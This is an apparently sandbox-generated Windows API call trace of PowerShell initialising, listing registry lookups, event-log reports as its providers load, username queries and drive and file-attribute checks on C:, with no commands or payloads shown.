	[0095.630] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x3a8) returned 0x0
	[0095.630] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0095.630] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x3ac) returned 0x0
	[0095.630] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0095.630] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x3b0) returned 0x0
	[0095.630] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0095.630] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x3b4) returned 0x0
	[0095.630] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0095.631] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x3b8) returned 0x0
	[0095.631] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0095.631] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x3bc) returned 0x0
	[0095.631] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x3c0) returned 0x0
	[0095.632] RegCloseKey (hKey=0x3c0) returned 0x0
	[0095.632] RegCloseKey (hKey=0x39c) returned 0x0
	[0095.632] RegCloseKey (hKey=0x3bc) returned 0x0
	[0095.640] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b960008
	[0095.644] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3dac8f8*="WSMan", lpRawData=0x3dac668) returned 1
	[0095.654] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0095.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.654] CoTaskMemFree (pv=0x307fb0) 
	[0095.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.657] CoTaskMemAlloc (cb=0x804) returned 0x1b86a450
	[0095.657] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86a450, nSize=0x16d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8e8) returned 0x1
	[0095.657] CoTaskMemFree (pv=0x1b86a450) 
	[0095.657] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.657] GetUserNameW (in: lpBuffer=0x29eb90, pcbBuffer=0x16d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d928) returned 1
	[0095.657] CoTaskMemFree (pv=0x29eb90) 
	[0095.658] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3db1e30*="Alias", lpRawData=0x3db1bc0) returned 1
	[0095.659] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0095.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.659] CoTaskMemFree (pv=0x307fb0) 
	[0095.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.661] CoTaskMemAlloc (cb=0x804) returned 0x1b86a450
	[0095.661] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86a450, nSize=0x16d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8e8) returned 0x1
	[0095.662] CoTaskMemFree (pv=0x1b86a450) 
	[0095.662] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.662] GetUserNameW (in: lpBuffer=0x29eb90, pcbBuffer=0x16d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d928) returned 1
	[0095.662] CoTaskMemFree (pv=0x29eb90) 
	[0095.663] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3db7428*="Environment", lpRawData=0x3db71b8) returned 1
	[0095.664] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0095.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.664] CoTaskMemFree (pv=0x307fb0) 
	[0095.665] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0095.665] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0095.665] CoTaskMemFree (pv=0x307fb0) 
	[0095.665] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0095.665] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0095.665] CoTaskMemFree (pv=0x307fb0) 
	[0095.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0095.666] SetErrorMode (uMode=0x1) returned 0x1
	[0095.666] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d6a0 | out: lpFileInformation=0x16d6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0095.666] SetErrorMode (uMode=0x1) returned 0x1
	[0095.667] GetLogicalDrives () returned 0x4
	[0095.667] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0095.668] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0095.668] SetErrorMode (uMode=0x1) returned 0x1
	[0095.668] CoTaskMemAlloc (cb=0x68) returned 0x1b863350
	[0095.668] CoTaskMemAlloc (cb=0x68) returned 0x1b8633c0
	[0095.668] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b863350, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d670, lpMaximumComponentLength=0x16d66c, lpFileSystemFlags=0x16d668, lpFileSystemNameBuffer=0x1b8633c0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d670*=0x9c354b42, lpMaximumComponentLength=0x16d66c*=0xff, lpFileSystemFlags=0x16d668*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0095.669] CoTaskMemFree (pv=0x1b863350) 
	[0095.669] CoTaskMemFree (pv=0x1b8633c0) 
	[0095.669] SetErrorMode (uMode=0x1) returned 0x1
	[0095.669] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0095.669] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0095.670] SetErrorMode (uMode=0x1) returned 0x1
	[0095.670] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d610 | out: lpFileInformation=0x16d610*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0095.670] SetErrorMode (uMode=0x1) returned 0x1
	[0095.670] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0095.670] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0095.670] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0095.670] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0095.671] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0095.671] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0095.672] SetErrorMode (uMode=0x1) returned 0x1
	[0095.672] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0095.672] SetErrorMode (uMode=0x1) returned 0x1
	[0095.672] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0095.672] SetErrorMode (uMode=0x1) returned 0x1
	[0095.672] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0095.672] SetErrorMode (uMode=0x1) returned 0x1
	[0095.672] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d280, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0095.672] SetErrorMode (uMode=0x1) returned 0x1
	[0095.672] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d4e0 | out: lpFileInformation=0x16d4e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0095.673] SetErrorMode (uMode=0x1) returned 0x1
	[0095.673] CoTaskMemAlloc (cb=0x804) returned 0x1b86a450
	[0095.673] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86a450, nSize=0x16d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8e8) returned 0x1
	[0095.722] CoTaskMemFree (pv=0x1b86a450) 
	[0095.722] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.723] GetUserNameW (in: lpBuffer=0x29eb90, pcbBuffer=0x16d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d928) returned 1
	[0095.723] CoTaskMemFree (pv=0x29eb90) 
	[0095.723] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3dbe518*="FileSystem", lpRawData=0x3dbe2a8) returned 1
	[0095.725] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0095.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.725] CoTaskMemFree (pv=0x307fb0) 
	[0095.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.877] CoTaskMemAlloc (cb=0x804) returned 0x1b86a450
	[0095.877] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86a450, nSize=0x16d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8e8) returned 0x1
	[0095.877] CoTaskMemFree (pv=0x1b86a450) 
	[0095.877] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.877] GetUserNameW (in: lpBuffer=0x29eb90, pcbBuffer=0x16d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d928) returned 1
	[0095.878] CoTaskMemFree (pv=0x29eb90) 
	[0095.879] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eed7d8*="Function", lpRawData=0x2eed568) returned 1
	[0095.884] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0095.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0095.884] CoTaskMemFree (pv=0x307fb0) 
	[0095.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.088] CoTaskMemAlloc (cb=0x804) returned 0x1b86a450
	[0096.088] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86a450, nSize=0x16d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8e8) returned 0x1
	[0096.089] CoTaskMemFree (pv=0x1b86a450) 
	[0096.089] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0096.089] GetUserNameW (in: lpBuffer=0x29eb90, pcbBuffer=0x16d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d928) returned 1
	[0096.089] CoTaskMemFree (pv=0x29eb90) 
	[0096.090] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f1fbb0*="Registry", lpRawData=0x2f1f940) returned 1
	[0096.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.093] CoTaskMemAlloc (cb=0x804) returned 0x1b86a450
	[0096.093] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86a450, nSize=0x16d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8e8) returned 0x1
	[0096.093] CoTaskMemFree (pv=0x1b86a450) 
	[0096.093] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0096.093] GetUserNameW (in: lpBuffer=0x29eb90, pcbBuffer=0x16d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d928) returned 1
	[0096.094] CoTaskMemFree (pv=0x29eb90) 
	[0096.094] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f24fc8*="Variable", lpRawData=0x2f24d58) returned 1
	[0096.096] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.096] CoTaskMemFree (pv=0x307fb0) 
	[0096.099] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.099] CoTaskMemFree (pv=0x307fb0) 
	[0096.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0096.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0096.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0096.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0096.194] CoTaskMemAlloc (cb=0x804) returned 0x1b86a450
	[0096.194] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86a450, nSize=0x16d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8e8) returned 0x1
	[0096.195] CoTaskMemFree (pv=0x1b86a450) 
	[0096.195] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0096.195] GetUserNameW (in: lpBuffer=0x29eb90, pcbBuffer=0x16d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d928) returned 1
	[0096.195] CoTaskMemFree (pv=0x29eb90) 
	[0096.196] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f38be0*="Certificate", lpRawData=0x2f38970) returned 1
	[0096.244] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.244] CoTaskMemFree (pv=0x307fb0) 
	[0096.248] GetLogicalDrives () returned 0x4
	[0096.248] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0096.248] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0096.249] CoTaskMemAlloc (cb=0x20e) returned 0x292c60
